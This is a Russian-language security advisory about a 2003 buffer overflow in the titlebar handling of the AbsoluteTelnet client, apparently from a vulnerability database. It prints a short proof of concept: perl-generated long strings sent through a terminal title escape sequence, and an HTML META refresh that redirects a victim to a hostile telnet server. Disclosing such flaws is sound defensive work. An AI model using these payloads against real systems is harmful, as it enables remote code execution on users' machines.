| Дата публикации: | 10.02.2003 |
| Всего просмотров: | 1175 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Переполнение буфера обнаружено в AbsoluteTelnet. Удаленный атакующий может выполнить произвольный код с пользовательскими привилегиями. Переполнение обнаружено в функции titlebar. Пример: export KNUD=`perl -e 'print "A" x 174'` echo -ne "\033]0;$KNUD\007" export KNUD=`perl -e 'print "A" x 296'` echo -ne "\033]0;$KNUD\007" <pre> Если AbsoluteTelnet клиент конфигурирован как telnet клиент по умолчанию, то уязвимость может использоваться через специально сформированную Web страницу. Пример: <pre> <META HTTP-EQUIV="Refresh" CONTENT="0;URL=telnet://hostile.serv.er">Уязвимость обнаружена в AbsoluteTelnet 2.00, 2.11 и устранена в 2.12 RC10 |
| Ссылки: | AbsoluteTelnet 2.00 buffer overflow. |